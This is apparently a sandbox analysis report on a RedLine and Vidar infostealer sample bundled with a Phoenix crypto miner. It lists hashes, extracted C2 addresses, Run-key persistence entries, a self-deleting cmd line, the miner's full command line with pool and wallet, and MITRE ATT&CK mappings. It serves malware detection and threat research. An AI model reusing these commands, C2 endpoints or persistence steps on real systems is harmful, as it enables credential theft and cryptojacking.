redline | 93aea5c8a9ce799229c9465a3557a3762a2bbeb64a5d51b6da42ea60552bcb93

Analysis

max time kernel
147s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
24-09-2022 23:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

11.3MB
MD5

df5198c522f60c3f38950e630b2c87d0
SHA1

d8838044d8b30d6be6dbe03dbd5ce82900c0c2d9
SHA256

93aea5c8a9ce799229c9465a3557a3762a2bbeb64a5d51b6da42ea60552bcb93
SHA512

d503ce2d4d95467986d5947d6b649eaa238a90825b884a8b2636228ded405b31434f784aed000ce82d95469fe611e3c746b0b0ec37494ec8ee9f3bcd266905e1
SSDEEP

196608:O7RbP+e8wURjoClh84Y2oJYwBiHyOSusOCipjg:/5OR

Score

10^/10

redline vidar 1680 lyla.22.09 discovery infostealer miner persistence spyware stealer vmprotect

Malware Config

Extracted

Family

vidar

Version

54.6

Botnet

1680

https://t.me/huobiinside

https://mas.to/@kyriazhs1975

Attributes

profile_id
1680

Extracted

Family

redline

Botnet

Lyla.22.09

185.215.113.216:21921

Attributes

auth_value
2f19888cb6bad7fdc46df91dc06aacc5

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Detectes Phoenix Miner Payload 4 IoCs

miner

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\explorer\svchost.exe	miner_phoenix
C:\Users\Admin\AppData\Roaming\explorer\svchost.exe	miner_phoenix
behavioral2/memory/2084-149-0x00007FF6D3600000-0x00007FF6D4B57000-memory.dmp	miner_phoenix
behavioral2/memory/2084-153-0x00007FF6D3600000-0x00007FF6D4B57000-memory.dmp	miner_phoenix

Downloads MZ/PE file

Executes dropped EXE 10 IoCs

Processes:

explorer.exesvchost.exeE6DA8HK56E35193.exeAD2I6F9K88DKCBE.exeE6DA8HK56E35193.exeAD2I6F9K88DKCBE.exeC4K99JC0GK2MK5M.exeC4K99JC0GK2MK5M.exe5D04CDMHBGEHDBC.exe5MH5E6MMC0CMHIF.exe

pid	process
4244	explorer.exe
2084	svchost.exe
2168	E6DA8HK56E35193.exe
3640	AD2I6F9K88DKCBE.exe
3104	E6DA8HK56E35193.exe
5108	AD2I6F9K88DKCBE.exe
2012	C4K99JC0GK2MK5M.exe
1712	C4K99JC0GK2MK5M.exe
4968	5D04CDMHBGEHDBC.exe
3452	5MH5E6MMC0CMHIF.exe

VMProtect packed file 4 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\explorer\svchost.exe	vmprotect
C:\Users\Admin\AppData\Roaming\explorer\svchost.exe	vmprotect
behavioral2/memory/2084-149-0x00007FF6D3600000-0x00007FF6D4B57000-memory.dmp	vmprotect
behavioral2/memory/2084-153-0x00007FF6D3600000-0x00007FF6D4B57000-memory.dmp	vmprotect

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

5D04CDMHBGEHDBC.exeE6DA8HK56E35193.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	5D04CDMHBGEHDBC.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	E6DA8HK56E35193.exe

Loads dropped DLL 6 IoCs

Processes:

E6DA8HK56E35193.exerundll32.exerundll32.exe

pid process

3104 E6DA8HK56E35193.exe
3104 E6DA8HK56E35193.exe
2668 rundll32.exe
2668 rundll32.exe
4344 rundll32.exe
4344 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3104	E6DA8HK56E35193.exe
3104	E6DA8HK56E35193.exe
2668	rundll32.exe
2668	rundll32.exe
4344	rundll32.exe
4344	rundll32.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

file.exeC4K99JC0GK2MK5M.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Run	file.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "C:\\Users\\Admin\\AppData\\Roaming\\explorer\\explorer.exe"	file.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe"	C4K99JC0GK2MK5M.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

svchost.exe

pid process

2084 svchost.exe
2084 svchost.exe

pid	process
2084	svchost.exe
2084	svchost.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

file.exeE6DA8HK56E35193.exeAD2I6F9K88DKCBE.exeC4K99JC0GK2MK5M.exe

description	pid	process	target process
PID 4988 set thread context of 4752	4988	file.exe	file.exe
PID 2168 set thread context of 3104	2168	E6DA8HK56E35193.exe	E6DA8HK56E35193.exe
PID 3640 set thread context of 5108	3640	AD2I6F9K88DKCBE.exe	AD2I6F9K88DKCBE.exe
PID 2012 set thread context of 1712	2012	C4K99JC0GK2MK5M.exe	C4K99JC0GK2MK5M.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

E6DA8HK56E35193.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	E6DA8HK56E35193.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	E6DA8HK56E35193.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4712 timeout.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

3888 taskkill.exe

pid	process
4712	timeout.exe

pid	process
3888	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

Processes:

5MH5E6MMC0CMHIF.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	5MH5E6MMC0CMHIF.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\IESettingSync	5MH5E6MMC0CMHIF.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	5MH5E6MMC0CMHIF.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	5MH5E6MMC0CMHIF.exe

Modifies registry class 1 IoCs

Processes:

5D04CDMHBGEHDBC.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings 5D04CDMHBGEHDBC.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

svchost.exeE6DA8HK56E35193.exeAD2I6F9K88DKCBE.exe

pid process

2084 svchost.exe
2084 svchost.exe
3104 E6DA8HK56E35193.exe
3104 E6DA8HK56E35193.exe
5108 AD2I6F9K88DKCBE.exe
5108 AD2I6F9K88DKCBE.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	5D04CDMHBGEHDBC.exe

pid	process
2084	svchost.exe
2084	svchost.exe
3104	E6DA8HK56E35193.exe
3104	E6DA8HK56E35193.exe
5108	AD2I6F9K88DKCBE.exe
5108	AD2I6F9K88DKCBE.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

C4K99JC0GK2MK5M.exetaskkill.exeAD2I6F9K88DKCBE.exe

description	pid	process
Token: SeDebugPrivilege	1712	C4K99JC0GK2MK5M.exe
Token: SeDebugPrivilege	3888	taskkill.exe
Token: SeDebugPrivilege	5108	AD2I6F9K88DKCBE.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

5MH5E6MMC0CMHIF.exe

pid process

3452 5MH5E6MMC0CMHIF.exe
3452 5MH5E6MMC0CMHIF.exe

pid	process
3452	5MH5E6MMC0CMHIF.exe
3452	5MH5E6MMC0CMHIF.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

file.exefile.execmd.exeexplorer.exeE6DA8HK56E35193.exeAD2I6F9K88DKCBE.exeC4K99JC0GK2MK5M.exe5D04CDMHBGEHDBC.execontrol.exeE6DA8HK56E35193.exe

description	pid	process	target process
PID 4988 wrote to memory of 4752	4988	file.exe	file.exe
PID 4988 wrote to memory of 4752	4988	file.exe	file.exe
PID 4988 wrote to memory of 4752	4988	file.exe	file.exe
PID 4988 wrote to memory of 4752	4988	file.exe	file.exe
PID 4988 wrote to memory of 4752	4988	file.exe	file.exe
PID 4988 wrote to memory of 4752	4988	file.exe	file.exe
PID 4988 wrote to memory of 4752	4988	file.exe	file.exe
PID 4988 wrote to memory of 4752	4988	file.exe	file.exe
PID 4988 wrote to memory of 4752	4988	file.exe	file.exe
PID 4752 wrote to memory of 4556	4752	file.exe	cmd.exe
PID 4752 wrote to memory of 4556	4752	file.exe	cmd.exe
PID 4752 wrote to memory of 4556	4752	file.exe	cmd.exe
PID 4556 wrote to memory of 4244	4556	cmd.exe	explorer.exe
PID 4556 wrote to memory of 4244	4556	cmd.exe	explorer.exe
PID 4244 wrote to memory of 2084	4244	explorer.exe	svchost.exe
PID 4244 wrote to memory of 2084	4244	explorer.exe	svchost.exe
PID 4752 wrote to memory of 2168	4752	file.exe	E6DA8HK56E35193.exe
PID 4752 wrote to memory of 2168	4752	file.exe	E6DA8HK56E35193.exe
PID 4752 wrote to memory of 2168	4752	file.exe	E6DA8HK56E35193.exe
PID 4752 wrote to memory of 3640	4752	file.exe	AD2I6F9K88DKCBE.exe
PID 4752 wrote to memory of 3640	4752	file.exe	AD2I6F9K88DKCBE.exe
PID 4752 wrote to memory of 3640	4752	file.exe	AD2I6F9K88DKCBE.exe
PID 2168 wrote to memory of 3104	2168	E6DA8HK56E35193.exe	E6DA8HK56E35193.exe
PID 2168 wrote to memory of 3104	2168	E6DA8HK56E35193.exe	E6DA8HK56E35193.exe
PID 2168 wrote to memory of 3104	2168	E6DA8HK56E35193.exe	E6DA8HK56E35193.exe
PID 2168 wrote to memory of 3104	2168	E6DA8HK56E35193.exe	E6DA8HK56E35193.exe
PID 2168 wrote to memory of 3104	2168	E6DA8HK56E35193.exe	E6DA8HK56E35193.exe
PID 2168 wrote to memory of 3104	2168	E6DA8HK56E35193.exe	E6DA8HK56E35193.exe
PID 2168 wrote to memory of 3104	2168	E6DA8HK56E35193.exe	E6DA8HK56E35193.exe
PID 2168 wrote to memory of 3104	2168	E6DA8HK56E35193.exe	E6DA8HK56E35193.exe
PID 2168 wrote to memory of 3104	2168	E6DA8HK56E35193.exe	E6DA8HK56E35193.exe
PID 3640 wrote to memory of 5108	3640	AD2I6F9K88DKCBE.exe	AD2I6F9K88DKCBE.exe
PID 3640 wrote to memory of 5108	3640	AD2I6F9K88DKCBE.exe	AD2I6F9K88DKCBE.exe
PID 3640 wrote to memory of 5108	3640	AD2I6F9K88DKCBE.exe	AD2I6F9K88DKCBE.exe
PID 3640 wrote to memory of 5108	3640	AD2I6F9K88DKCBE.exe	AD2I6F9K88DKCBE.exe
PID 3640 wrote to memory of 5108	3640	AD2I6F9K88DKCBE.exe	AD2I6F9K88DKCBE.exe
PID 3640 wrote to memory of 5108	3640	AD2I6F9K88DKCBE.exe	AD2I6F9K88DKCBE.exe
PID 3640 wrote to memory of 5108	3640	AD2I6F9K88DKCBE.exe	AD2I6F9K88DKCBE.exe
PID 3640 wrote to memory of 5108	3640	AD2I6F9K88DKCBE.exe	AD2I6F9K88DKCBE.exe
PID 4752 wrote to memory of 2012	4752	file.exe	C4K99JC0GK2MK5M.exe
PID 4752 wrote to memory of 2012	4752	file.exe	C4K99JC0GK2MK5M.exe
PID 4752 wrote to memory of 2012	4752	file.exe	C4K99JC0GK2MK5M.exe
PID 2012 wrote to memory of 1712	2012	C4K99JC0GK2MK5M.exe	C4K99JC0GK2MK5M.exe
PID 2012 wrote to memory of 1712	2012	C4K99JC0GK2MK5M.exe	C4K99JC0GK2MK5M.exe
PID 2012 wrote to memory of 1712	2012	C4K99JC0GK2MK5M.exe	C4K99JC0GK2MK5M.exe
PID 2012 wrote to memory of 1712	2012	C4K99JC0GK2MK5M.exe	C4K99JC0GK2MK5M.exe
PID 2012 wrote to memory of 1712	2012	C4K99JC0GK2MK5M.exe	C4K99JC0GK2MK5M.exe
PID 2012 wrote to memory of 1712	2012	C4K99JC0GK2MK5M.exe	C4K99JC0GK2MK5M.exe
PID 2012 wrote to memory of 1712	2012	C4K99JC0GK2MK5M.exe	C4K99JC0GK2MK5M.exe
PID 2012 wrote to memory of 1712	2012	C4K99JC0GK2MK5M.exe	C4K99JC0GK2MK5M.exe
PID 4752 wrote to memory of 4968	4752	file.exe	5D04CDMHBGEHDBC.exe
PID 4752 wrote to memory of 4968	4752	file.exe	5D04CDMHBGEHDBC.exe
PID 4752 wrote to memory of 4968	4752	file.exe	5D04CDMHBGEHDBC.exe
PID 4752 wrote to memory of 3452	4752	file.exe	5MH5E6MMC0CMHIF.exe
PID 4752 wrote to memory of 3452	4752	file.exe	5MH5E6MMC0CMHIF.exe
PID 4968 wrote to memory of 3572	4968	5D04CDMHBGEHDBC.exe	control.exe
PID 4968 wrote to memory of 3572	4968	5D04CDMHBGEHDBC.exe	control.exe
PID 4968 wrote to memory of 3572	4968	5D04CDMHBGEHDBC.exe	control.exe
PID 3572 wrote to memory of 2668	3572	control.exe	rundll32.exe
PID 3572 wrote to memory of 2668	3572	control.exe	rundll32.exe
PID 3572 wrote to memory of 2668	3572	control.exe	rundll32.exe
PID 3104 wrote to memory of 4892	3104	E6DA8HK56E35193.exe	cmd.exe
PID 3104 wrote to memory of 4892	3104	E6DA8HK56E35193.exe	cmd.exe
PID 3104 wrote to memory of 4892	3104	E6DA8HK56E35193.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4988

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
2⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4752

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Roaming\explorer\explorer.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4556

C:\Users\Admin\AppData\Roaming\explorer\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer\explorer.exe
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4244

C:\Users\Admin\AppData\Roaming\explorer\svchost.exe
-pool us-etc.2miners.com:1010 -wal 0xB7b2553E9b6DC10186ddD09AB9fbE71C68da0851.ferms -epsw x -mode 1 -log 0 -mport 0 -etha 0 -ftime 55 -retrydelay 1 -coin etc
5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2084

C:\Users\Admin\AppData\Local\Temp\E6DA8HK56E35193.exe
"C:\Users\Admin\AppData\Local\Temp\E6DA8HK56E35193.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2168

C:\Users\Admin\AppData\Local\Temp\E6DA8HK56E35193.exe
"C:\Users\Admin\AppData\Local\Temp\E6DA8HK56E35193.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3104

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" \/c taskkill /im E6DA8HK56E35193.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\E6DA8HK56E35193.exe" & del C:\PrograData\*.dll & exit
5⤵
PID:4892

C:\Windows\SysWOW64\taskkill.exe
taskkill /im E6DA8HK56E35193.exe /f
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3888

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
6⤵
- Delays execution with timeout.exe
PID:4712

C:\Users\Admin\AppData\Local\Temp\AD2I6F9K88DKCBE.exe
"C:\Users\Admin\AppData\Local\Temp\AD2I6F9K88DKCBE.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3640

C:\Users\Admin\AppData\Local\Temp\AD2I6F9K88DKCBE.exe
"C:\Users\Admin\AppData\Local\Temp\AD2I6F9K88DKCBE.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5108

C:\Users\Admin\AppData\Local\Temp\C4K99JC0GK2MK5M.exe
"C:\Users\Admin\AppData\Local\Temp\C4K99JC0GK2MK5M.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2012

C:\Users\Admin\AppData\Local\Temp\C4K99JC0GK2MK5M.exe
"C:\Users\Admin\AppData\Local\Temp\C4K99JC0GK2MK5M.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:1712

C:\Users\Admin\AppData\Local\Temp\5D04CDMHBGEHDBC.exe
"C:\Users\Admin\AppData\Local\Temp\5D04CDMHBGEHDBC.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4968

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\6pcd.cpl",
4⤵
- Suspicious use of WriteProcessMemory
PID:3572

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\6pcd.cpl",
5⤵
- Loads dropped DLL
PID:2668

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\6pcd.cpl",
6⤵
PID:2900

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\6pcd.cpl",
7⤵
- Loads dropped DLL
PID:4344

C:\Users\Admin\AppData\Local\Temp\5MH5E6MMC0CMHIF.exe
https://iplogger.org/1x5az7
3⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3452

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\mozglue.dll
Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll
Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AD2I6F9K88DKCBE.exe.log
Filesize
42B

MD5
84cfdb4b995b1dbf543b26b86c863adc

SHA1
d2f47764908bf30036cf8248b9ff5541e2711fa2

SHA256
d8988d672d6915b46946b28c06ad8066c50041f6152a91d37ffa5cf129cc146b

SHA512
485f0ed45e13f00a93762cbf15b4b8f996553baa021152fae5aba051e3736bcd3ca8f4328f0e6d9e3e1f910c96c4a9ae055331123ee08e3c2ce3a99ac2e177ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\C4K99JC0GK2MK5M.exe.log
Filesize
42B

MD5
84cfdb4b995b1dbf543b26b86c863adc

SHA1
d2f47764908bf30036cf8248b9ff5541e2711fa2

SHA256
d8988d672d6915b46946b28c06ad8066c50041f6152a91d37ffa5cf129cc146b

SHA512
485f0ed45e13f00a93762cbf15b4b8f996553baa021152fae5aba051e3736bcd3ca8f4328f0e6d9e3e1f910c96c4a9ae055331123ee08e3c2ce3a99ac2e177ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\5D04CDMHBGEHDBC.exe
Filesize
1.7MB

MD5
0aadc0f3e2e08131e4d1a1286f42b86c

SHA1
fd19da0547d249ab164eedc9ff44d2082c3e8381

SHA256
2dc3a07e0250d68897ce410535111862be783922356b9a687a349235e8b484d1

SHA512
4852f24b9002322112590221f820f5c2841416b253ae1bb269280245ed3ac184b98fbb6a1dd86fc5a82c017a3dc93f0aa20fcd5ef3d8f9135384b42d6eb61474

Download Submit
C:\Users\Admin\AppData\Local\Temp\5D04CDMHBGEHDBC.exe
Filesize
1.7MB

MD5
0aadc0f3e2e08131e4d1a1286f42b86c

SHA1
fd19da0547d249ab164eedc9ff44d2082c3e8381

SHA256
2dc3a07e0250d68897ce410535111862be783922356b9a687a349235e8b484d1

SHA512
4852f24b9002322112590221f820f5c2841416b253ae1bb269280245ed3ac184b98fbb6a1dd86fc5a82c017a3dc93f0aa20fcd5ef3d8f9135384b42d6eb61474

Download Submit
C:\Users\Admin\AppData\Local\Temp\5MH5E6MMC0CMHIF.exe
Filesize
8KB

MD5
8719ce641e7c777ac1b0eaec7b5fa7c7

SHA1
c04de52cb511480cc7d00d67f1d9e17b02d6406b

SHA256
6283ac6ecbf4c4038cf44896dd221c7c11152bac77273709330409032c3e72ea

SHA512
7be5bd6d2342dd02818f1979e7e74a6376658711ac82a59b2af1a67207cfd3c7416b657af01216473b15132e4aa5c6675f0eb8ee6343192c7dfc4a5249ccaa97

Download Submit
C:\Users\Admin\AppData\Local\Temp\5MH5E6MMC0CMHIF.exe
Filesize
8KB

MD5
8719ce641e7c777ac1b0eaec7b5fa7c7

SHA1
c04de52cb511480cc7d00d67f1d9e17b02d6406b

SHA256
6283ac6ecbf4c4038cf44896dd221c7c11152bac77273709330409032c3e72ea

SHA512
7be5bd6d2342dd02818f1979e7e74a6376658711ac82a59b2af1a67207cfd3c7416b657af01216473b15132e4aa5c6675f0eb8ee6343192c7dfc4a5249ccaa97

Download Submit
C:\Users\Admin\AppData\Local\Temp\6pcd.cpl
Filesize
1.8MB

MD5
8f6adccce10194146c8329c13851c19a

SHA1
1887e040c8e1d0689f7e788d1420466b32bb1444

SHA256
958fae47c06d8d1ff2681aae4864a7badfc2760e1bb922da35dc7a1c185852d3

SHA512
5bb10b456729aeb553f4ed48f406c38089ac3da58e7158b6b813e0c7f7da5a6aea2282342a044811e2591000e7ff3f694065c64cb633475c79c11219f16bd046

Download Submit
C:\Users\Admin\AppData\Local\Temp\6pcd.cpl
Filesize
1.8MB

MD5
8f6adccce10194146c8329c13851c19a

SHA1
1887e040c8e1d0689f7e788d1420466b32bb1444

SHA256
958fae47c06d8d1ff2681aae4864a7badfc2760e1bb922da35dc7a1c185852d3

SHA512
5bb10b456729aeb553f4ed48f406c38089ac3da58e7158b6b813e0c7f7da5a6aea2282342a044811e2591000e7ff3f694065c64cb633475c79c11219f16bd046

Download Submit
C:\Users\Admin\AppData\Local\Temp\6pcd.cpl
Filesize
1.8MB

MD5
8f6adccce10194146c8329c13851c19a

SHA1
1887e040c8e1d0689f7e788d1420466b32bb1444

SHA256
958fae47c06d8d1ff2681aae4864a7badfc2760e1bb922da35dc7a1c185852d3

SHA512
5bb10b456729aeb553f4ed48f406c38089ac3da58e7158b6b813e0c7f7da5a6aea2282342a044811e2591000e7ff3f694065c64cb633475c79c11219f16bd046

Download Submit
C:\Users\Admin\AppData\Local\Temp\6pcd.cpl
Filesize
1.8MB

MD5
8f6adccce10194146c8329c13851c19a

SHA1
1887e040c8e1d0689f7e788d1420466b32bb1444

SHA256
958fae47c06d8d1ff2681aae4864a7badfc2760e1bb922da35dc7a1c185852d3

SHA512
5bb10b456729aeb553f4ed48f406c38089ac3da58e7158b6b813e0c7f7da5a6aea2282342a044811e2591000e7ff3f694065c64cb633475c79c11219f16bd046

Download Submit
C:\Users\Admin\AppData\Local\Temp\6pcd.cpl
Filesize
1.8MB

MD5
8f6adccce10194146c8329c13851c19a

SHA1
1887e040c8e1d0689f7e788d1420466b32bb1444

SHA256
958fae47c06d8d1ff2681aae4864a7badfc2760e1bb922da35dc7a1c185852d3

SHA512
5bb10b456729aeb553f4ed48f406c38089ac3da58e7158b6b813e0c7f7da5a6aea2282342a044811e2591000e7ff3f694065c64cb633475c79c11219f16bd046

Download Submit
C:\Users\Admin\AppData\Local\Temp\AD2I6F9K88DKCBE.exe
Filesize
11.2MB

MD5
3898bc6bc5a535cbe6dea75d1664ddd1

SHA1
5ba65c1b8559e2f0db3e52514c0d81abe1d9109d

SHA256
45fa9fe3c81b24b904617aad27ab836e99b3e45252d0ffc684e901a24442aa25

SHA512
1a9a958af18de2c7049a102cd127318f572d9725854eaa9f367eb905ccc2e034a782c06ca9a6f1b6decf3eefc0c3cc5575a8d01ace1dbc792fb63986d5a0a186

Download Submit
C:\Users\Admin\AppData\Local\Temp\AD2I6F9K88DKCBE.exe
Filesize
11.2MB

MD5
3898bc6bc5a535cbe6dea75d1664ddd1

SHA1
5ba65c1b8559e2f0db3e52514c0d81abe1d9109d

SHA256
45fa9fe3c81b24b904617aad27ab836e99b3e45252d0ffc684e901a24442aa25

SHA512
1a9a958af18de2c7049a102cd127318f572d9725854eaa9f367eb905ccc2e034a782c06ca9a6f1b6decf3eefc0c3cc5575a8d01ace1dbc792fb63986d5a0a186

Download Submit
C:\Users\Admin\AppData\Local\Temp\AD2I6F9K88DKCBE.exe
Filesize
11.2MB

MD5
3898bc6bc5a535cbe6dea75d1664ddd1

SHA1
5ba65c1b8559e2f0db3e52514c0d81abe1d9109d

SHA256
45fa9fe3c81b24b904617aad27ab836e99b3e45252d0ffc684e901a24442aa25

SHA512
1a9a958af18de2c7049a102cd127318f572d9725854eaa9f367eb905ccc2e034a782c06ca9a6f1b6decf3eefc0c3cc5575a8d01ace1dbc792fb63986d5a0a186

Download Submit
C:\Users\Admin\AppData\Local\Temp\C4K99JC0GK2MK5M.exe
Filesize
11.1MB

MD5
0345b9909e6f8a67627c667d100da1e8

SHA1
1b72c7372856bd71550e1184e353f452ff2b61a8

SHA256
d3061098277ac0e6dbc8f21e232e8b8514dca48b8b6b95cc583a6049d36eaf1f

SHA512
7bb53312ede16b3cfde48b897ed8f7047e8b47136099d96c83c3e50e64f3485bbc03d814acabbca279c937661111bb9d95fd03b02f28e5da667491567f33beed

Download Submit
C:\Users\Admin\AppData\Local\Temp\C4K99JC0GK2MK5M.exe
Filesize
11.1MB

MD5
0345b9909e6f8a67627c667d100da1e8

SHA1
1b72c7372856bd71550e1184e353f452ff2b61a8

SHA256
d3061098277ac0e6dbc8f21e232e8b8514dca48b8b6b95cc583a6049d36eaf1f

SHA512
7bb53312ede16b3cfde48b897ed8f7047e8b47136099d96c83c3e50e64f3485bbc03d814acabbca279c937661111bb9d95fd03b02f28e5da667491567f33beed

Download Submit
C:\Users\Admin\AppData\Local\Temp\C4K99JC0GK2MK5M.exe
Filesize
11.1MB

MD5
0345b9909e6f8a67627c667d100da1e8

SHA1
1b72c7372856bd71550e1184e353f452ff2b61a8

SHA256
d3061098277ac0e6dbc8f21e232e8b8514dca48b8b6b95cc583a6049d36eaf1f

SHA512
